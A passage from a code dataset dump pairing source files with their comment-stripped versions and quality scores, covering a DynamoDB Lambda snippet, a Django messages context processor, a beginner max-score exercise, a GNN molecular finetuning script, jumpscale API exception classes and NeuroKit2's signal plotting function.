# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
# creating a DynamoDB table. Note that the attributes of this table
# are lazy-loaded: a request is not made nor are the attribute
# values populated until the attributes
# on the table resource are accessed or its load() method is called.
table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
# Print out some data about the table.
# This will cause a request to be made to DynamoDB and its attribute
# values will be set based on the response.
print(table.creation_date_time)
# put_item is exposed on the Table resource, not on the service resource
table.put_item(
Item=tweet
) | en | 0.760083 | Original code contributor: mentzera Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/ # from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \ # twitter_to_es # dynamoDb_client = boto3.client('dynamodb') # Lambda execution starts here # Get the bucket name and key for the new file # Get s3 object, read, and split the file into lines # Parse s3 object content (JSON) # https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3 # clean trailing comma # print(tweets_str) # print(tweet['sentiments']) #===================== #==send data to dynamoDB #===================== # Get the service resource. # Instantiate a table resource object without actually # creating a DynamoDB table. Note that the attributes of this table # are lazy-loaded: a request is not made nor are the attribute # values populated until the attributes # on the table resource are accessed or its load() method is called. # Print out some data about the table. # This will cause a request to be made to DynamoDB and its attribute # values will be set based on the response. | 2.645139 | 3 |
user_messages/context_processors.py | everaccountable/django-user-messages | 21 | 8041 | from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
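# Usage sketch (assumed Django settings, not part of this module): the processor is
# enabled by listing its dotted path in the template backend options, e.g.
# TEMPLATES = [{
#     "BACKEND": "django.template.backends.django.DjangoTemplates",
#     "OPTIONS": {
#         "context_processors": [
#             # ...
#             "user_messages.context_processors.messages",
#         ],
#     },
# }]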
| from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
| en | 0.943273 | Return a lazy 'messages' context variable as well as 'DEFAULT_MESSAGE_LEVELS'. | 2.075097 | 2 |
Day_5/highest_score.py | ecanro/100DaysOfCode_Python | 0 | 8042 | <filename>Day_5/highest_score.py
## Highest Score
# 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
# Write your code below this row 👇
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | <filename>Day_5/highest_score.py
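# Example run (input values are an assumption):
#   Input a list of student scores: 78 65 89 86 55
#   [78, 65, 89, 86, 55]
#   The highest score is: 89
#   89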
## Highest Score
# 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
# Write your code below this row 👇
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | en | 0.651194 | ## Highest Score # 🚨 Don't change the code below 👇 # 🚨 Don't change the code above 👆 # Write your code below this row 👇 # functional code | 3.903788 | 4 |
finetune/finetune.py | zaixizhang/MGSSL | 43 | 8043 | <gh_stars>10-100
import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split, random_scaffold_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
def train(args, model, device, loader, optimizer):
model.train()
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y = batch.y.view(pred.shape).to(torch.float64)
#Whether y is non-null or not.
is_valid = y**2 > 0
#Loss matrix
loss_mat = criterion(pred.double(), (y+1)/2)
#loss matrix after removing null target
loss_mat = torch.where(is_valid, loss_mat, torch.zeros(loss_mat.shape).to(loss_mat.device).to(loss_mat.dtype))
optimizer.zero_grad()
loss = torch.sum(loss_mat)/torch.sum(is_valid)
loss.backward()
optimizer.step()
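# Label convention used above (readable from the masking logic): y is +1 for a
# positive, -1 for a negative and 0 when a task label is missing, so
# is_valid = y**2 > 0 drops missing entries and (y+1)/2 maps {-1,+1} to {0,1} for
# BCEWithLogitsLoss. E.g. y = [-1, 0, +1] yields targets [0, -, 1] with only the
# first and last positions contributing to the averaged loss.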
def eval(args, model, device, loader):
model.eval()
y_true = []
y_scores = []
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
with torch.no_grad():
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y_true.append(batch.y.view(pred.shape))
y_scores.append(pred)
y_true = torch.cat(y_true, dim = 0).cpu().numpy()
y_scores = torch.cat(y_scores, dim = 0).cpu().numpy()
roc_list = []
for i in range(y_true.shape[1]):
#AUC is only defined when there is at least one positive data.
if np.sum(y_true[:,i] == 1) > 0 and np.sum(y_true[:,i] == -1) > 0:
is_valid = y_true[:,i]**2 > 0
roc_list.append(roc_auc_score((y_true[is_valid,i] + 1)/2, y_scores[is_valid,i]))
if len(roc_list) < y_true.shape[1]:
print("Some target is missing!")
print("Missing ratio: %f" %(1 - float(len(roc_list))/y_true.shape[1]))
return sum(roc_list)/len(roc_list) #y_true.shape[1]
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate (default: 0.001)')
parser.add_argument('--lr_scale', type=float, default=1,
help='relative learning rate for the feature extraction layer (default: 1)')
parser.add_argument('--decay', type=float, default=0,
help='weight decay (default: 0)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5).')
parser.add_argument('--emb_dim', type=int, default=300,
help='embedding dimensions (default: 300)')
parser.add_argument('--dropout_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--graph_pooling', type=str, default="mean",
help='graph level pooling (sum, mean, max, set2set, attention)')
parser.add_argument('--JK', type=str, default="last",
help='how the node features across layers are combined. last, sum, max or concat')
parser.add_argument('--gnn_type', type=str, default="gin")
parser.add_argument('--dataset', type=str, default = 'sider', help='root directory of dataset. For now, only classification.')
parser.add_argument('--input_model_file', type=str, default = '../motif_based_pretrain/saved_model/motif_pretrain.pth', help='filename to read the model (if there is any)')
parser.add_argument('--filename', type=str, default = '', help='output filename')
parser.add_argument('--seed', type=int, default=42, help = "Seed for splitting the dataset.")
parser.add_argument('--runseed', type=int, default=0, help = "Seed for minibatch selection, random initialization.")
parser.add_argument('--split', type = str, default="scaffold", help = "random or scaffold or random_scaffold")
parser.add_argument('--eval_train', type=int, default = 1, help='evaluating training or not')
parser.add_argument('--num_workers', type=int, default = 4, help='number of workers for dataset loading')
args = parser.parse_args()
torch.manual_seed(args.runseed)
np.random.seed(args.runseed)
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.runseed)
#Bunch of classification tasks
if args.dataset == "tox21":
num_tasks = 12
elif args.dataset == "hiv":
num_tasks = 1
elif args.dataset == "pcba":
num_tasks = 128
elif args.dataset == "muv":
num_tasks = 17
elif args.dataset == "bace":
num_tasks = 1
elif args.dataset == "bbbp":
num_tasks = 1
elif args.dataset == "toxcast":
num_tasks = 617
elif args.dataset == "sider":
num_tasks = 27
elif args.dataset == "clintox":
num_tasks = 2
else:
raise ValueError("Invalid dataset name.")
#set up dataset
dataset = MoleculeDataset("dataset/" + args.dataset, dataset=args.dataset)
print(dataset)
if args.split == "scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1)
print("scaffold")
elif args.split == "random":
train_dataset, valid_dataset, test_dataset = random_split(dataset, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random")
elif args.split == "random_scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = random_scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random scaffold")
else:
raise ValueError("Invalid split option.")
print(train_dataset[0])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)
val_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
#set up model
model = GNN_graphpred(args.num_layer, args.emb_dim, num_tasks, JK = args.JK, drop_ratio = args.dropout_ratio, graph_pooling = args.graph_pooling, gnn_type = args.gnn_type)
if not args.input_model_file == "":
model.from_pretrained(args.input_model_file)
model.to(device)
#set up optimizer
#different learning rate for different part of GNN
model_param_group = []
model_param_group.append({"params": model.gnn.parameters()})
if args.graph_pooling == "attention":
model_param_group.append({"params": model.pool.parameters(), "lr":args.lr*args.lr_scale})
model_param_group.append({"params": model.graph_pred_linear.parameters(), "lr":args.lr*args.lr_scale})
optimizer = optim.Adam(model_param_group, lr=args.lr, weight_decay=args.decay)
print(optimizer)
for epoch in range(1, args.epochs+1):
print("====epoch " + str(epoch))
train(args, model, device, train_loader, optimizer)
print("====Evaluation")
if args.eval_train:
train_acc = eval(args, model, device, train_loader)
else:
print("omit the training accuracy computation")
train_acc = 0
val_acc = eval(args, model, device, val_loader)
test_acc = eval(args, model, device, test_loader)
print("train: %f val: %f test: %f" %(train_acc, val_acc, test_acc))
if __name__ == "__main__":
main()
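# Example invocation (paths and dataset choice are assumptions; all flags are defined
# in the argparse setup above):
# python finetune.py --dataset sider --split scaffold \
#     --input_model_file ../motif_based_pretrain/saved_model/motif_pretrain.pth \
#     --batch_size 32 --epochs 100 --runseed 0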
| import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split, random_scaffold_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
def train(args, model, device, loader, optimizer):
model.train()
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y = batch.y.view(pred.shape).to(torch.float64)
#Whether y is non-null or not.
is_valid = y**2 > 0
#Loss matrix
loss_mat = criterion(pred.double(), (y+1)/2)
#loss matrix after removing null target
loss_mat = torch.where(is_valid, loss_mat, torch.zeros(loss_mat.shape).to(loss_mat.device).to(loss_mat.dtype))
optimizer.zero_grad()
loss = torch.sum(loss_mat)/torch.sum(is_valid)
loss.backward()
optimizer.step()
def eval(args, model, device, loader):
model.eval()
y_true = []
y_scores = []
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
with torch.no_grad():
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y_true.append(batch.y.view(pred.shape))
y_scores.append(pred)
y_true = torch.cat(y_true, dim = 0).cpu().numpy()
y_scores = torch.cat(y_scores, dim = 0).cpu().numpy()
roc_list = []
for i in range(y_true.shape[1]):
#AUC is only defined when there is at least one positive data.
if np.sum(y_true[:,i] == 1) > 0 and np.sum(y_true[:,i] == -1) > 0:
is_valid = y_true[:,i]**2 > 0
roc_list.append(roc_auc_score((y_true[is_valid,i] + 1)/2, y_scores[is_valid,i]))
if len(roc_list) < y_true.shape[1]:
print("Some target is missing!")
print("Missing ratio: %f" %(1 - float(len(roc_list))/y_true.shape[1]))
return sum(roc_list)/len(roc_list) #y_true.shape[1]
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate (default: 0.001)')
parser.add_argument('--lr_scale', type=float, default=1,
help='relative learning rate for the feature extraction layer (default: 1)')
parser.add_argument('--decay', type=float, default=0,
help='weight decay (default: 0)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5).')
parser.add_argument('--emb_dim', type=int, default=300,
help='embedding dimensions (default: 300)')
parser.add_argument('--dropout_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--graph_pooling', type=str, default="mean",
help='graph level pooling (sum, mean, max, set2set, attention)')
parser.add_argument('--JK', type=str, default="last",
help='how the node features across layers are combined. last, sum, max or concat')
parser.add_argument('--gnn_type', type=str, default="gin")
parser.add_argument('--dataset', type=str, default = 'sider', help='root directory of dataset. For now, only classification.')
parser.add_argument('--input_model_file', type=str, default = '../motif_based_pretrain/saved_model/motif_pretrain.pth', help='filename to read the model (if there is any)')
parser.add_argument('--filename', type=str, default = '', help='output filename')
parser.add_argument('--seed', type=int, default=42, help = "Seed for splitting the dataset.")
parser.add_argument('--runseed', type=int, default=0, help = "Seed for minibatch selection, random initialization.")
parser.add_argument('--split', type = str, default="scaffold", help = "random or scaffold or random_scaffold")
parser.add_argument('--eval_train', type=int, default = 1, help='evaluating training or not')
parser.add_argument('--num_workers', type=int, default = 4, help='number of workers for dataset loading')
args = parser.parse_args()
torch.manual_seed(args.runseed)
np.random.seed(args.runseed)
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.runseed)
#Bunch of classification tasks
if args.dataset == "tox21":
num_tasks = 12
elif args.dataset == "hiv":
num_tasks = 1
elif args.dataset == "pcba":
num_tasks = 128
elif args.dataset == "muv":
num_tasks = 17
elif args.dataset == "bace":
num_tasks = 1
elif args.dataset == "bbbp":
num_tasks = 1
elif args.dataset == "toxcast":
num_tasks = 617
elif args.dataset == "sider":
num_tasks = 27
elif args.dataset == "clintox":
num_tasks = 2
else:
raise ValueError("Invalid dataset name.")
#set up dataset
dataset = MoleculeDataset("dataset/" + args.dataset, dataset=args.dataset)
print(dataset)
if args.split == "scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1)
print("scaffold")
elif args.split == "random":
train_dataset, valid_dataset, test_dataset = random_split(dataset, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random")
elif args.split == "random_scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = random_scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random scaffold")
else:
raise ValueError("Invalid split option.")
print(train_dataset[0])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)
val_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
#set up model
model = GNN_graphpred(args.num_layer, args.emb_dim, num_tasks, JK = args.JK, drop_ratio = args.dropout_ratio, graph_pooling = args.graph_pooling, gnn_type = args.gnn_type)
if not args.input_model_file == "":
model.from_pretrained(args.input_model_file)
model.to(device)
#set up optimizer
#different learning rate for different part of GNN
model_param_group = []
model_param_group.append({"params": model.gnn.parameters()})
if args.graph_pooling == "attention":
model_param_group.append({"params": model.pool.parameters(), "lr":args.lr*args.lr_scale})
model_param_group.append({"params": model.graph_pred_linear.parameters(), "lr":args.lr*args.lr_scale})
optimizer = optim.Adam(model_param_group, lr=args.lr, weight_decay=args.decay)
print(optimizer)
for epoch in range(1, args.epochs+1):
print("====epoch " + str(epoch))
train(args, model, device, train_loader, optimizer)
print("====Evaluation")
if args.eval_train:
train_acc = eval(args, model, device, train_loader)
else:
print("omit the training accuracy computation")
train_acc = 0
val_acc = eval(args, model, device, val_loader)
test_acc = eval(args, model, device, test_loader)
print("train: %f val: %f test: %f" %(train_acc, val_acc, test_acc))
if __name__ == "__main__":
main() | en | 0.825241 | #Whether y is non-null or not. #Loss matrix #loss matrix after removing null target #AUC is only defined when there is at least one positive data. #y_true.shape[1] # Training settings #Bunch of classification tasks #set up dataset #set up model #set up optimizer #different learning rate for different part of GNN | 2.097953 | 2 |
jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 13 | 8044 | <reponame>threefoldtech/js-sdk
from jumpscale.core import exceptions
class BaseError(exceptions.Base):
"""a generic base error for bcdb rest, with status code"""
def __init__(self, status, *args, **kwargs):
super().__init__(*args, **kwargs)
self.status = status
class VDCNotFound(BaseError):
pass
class MissingAuthorizationHeader(BaseError):
pass
class InvalidCredentials(BaseError):
pass
class MissingArgument(BaseError):
pass
class StellarServiceDown(BaseError):
pass
class FlavorNotSupported(BaseError):
pass
class NoEnoughCapacity(BaseError):
pass
class AdddingNodeFailed(BaseError):
pass
class VirtualMachineDeploymentFailed(BaseError):
pass
class CannotDeleteMasterNode(BaseError):
pass
class ZDBDeploymentFailed(BaseError):
pass
class ZDBDeletionFailed(BaseError):
pass
class KubeConfigNotFound(BaseError):
pass
class InvalidKubeConfig(BaseError):
pass
class ZStorConfigNotFound(BaseError):
pass
class InvalidZStorConfig(BaseError):
pass
class NoEnoughFunds(BaseError):
pass
class BadRequestError(BaseError):
pass
class UnknownError(BaseError):
pass
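
# --- Editor's usage sketch (not part of the original module) ----------------
# Each exception above carries an HTTP-style status code through BaseError, so
# an API handler can raise e.g. ``VDCNotFound(404, "vdc 'demo' not found")``
# and map the status into a response. ``call_and_report`` is a hypothetical
# helper added here for illustration only.
def call_and_report(func, *args, **kwargs):
    """Run `func` and translate any BaseError into a (status, message) pair."""
    try:
        return 200, func(*args, **kwargs)
    except BaseError as error:
        return error.status, str(error)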
| from jumpscale.core import exceptions
class BaseError(exceptions.Base):
"""a generic base error for bcdb rest, with status code"""
def __init__(self, status, *args, **kwargs):
        super().__init__(*args, **kwargs)
self.status = status
class VDCNotFound(BaseError):
pass
class MissingAuthorizationHeader(BaseError):
pass
class InvalidCredentials(BaseError):
pass
class MissingArgument(BaseError):
pass
class StellarServiceDown(BaseError):
pass
class FlavorNotSupported(BaseError):
pass
class NoEnoughCapacity(BaseError):
pass
class AdddingNodeFailed(BaseError):
pass
class VirtualMachineDeploymentFailed(BaseError):
pass
class CannotDeleteMasterNode(BaseError):
pass
class ZDBDeploymentFailed(BaseError):
pass
class ZDBDeletionFailed(BaseError):
pass
class KubeConfigNotFound(BaseError):
pass
class InvalidKubeConfig(BaseError):
pass
class ZStorConfigNotFound(BaseError):
pass
class InvalidZStorConfig(BaseError):
pass
class NoEnoughFunds(BaseError):
pass
class BadRequestError(BaseError):
pass
class UnknownError(BaseError):
pass | en | 0.552627 | a generic base error for bcdb rest, with status code | 2.26575 | 2 |
neurokit2/signal/signal_plot.py | gutierrezps/NeuroKit | 1 | 8045 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
        Labels for the plotted signals, used in the legend (one per signal). Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
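
if __name__ == "__main__":
    # Editor's sketch (not part of the original module): a binary column whose
    # active samples are isolated (no consecutive indices) is detected as an
    # event channel by the logic above and drawn as vertical lines rather than
    # as a continuous trace.
    demo = pd.DataFrame({
        "Signal": np.sin(np.linspace(0, 20, 1000)),
        "Events": np.zeros(1000),
    })
    demo.loc[[100, 400, 700], "Events"] = 1  # isolated spikes -> event column
    signal_plot(demo, sampling_rate=100)
    plt.show()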
| # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
        Labels for the plotted signals, used in the legend (one per signal). Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
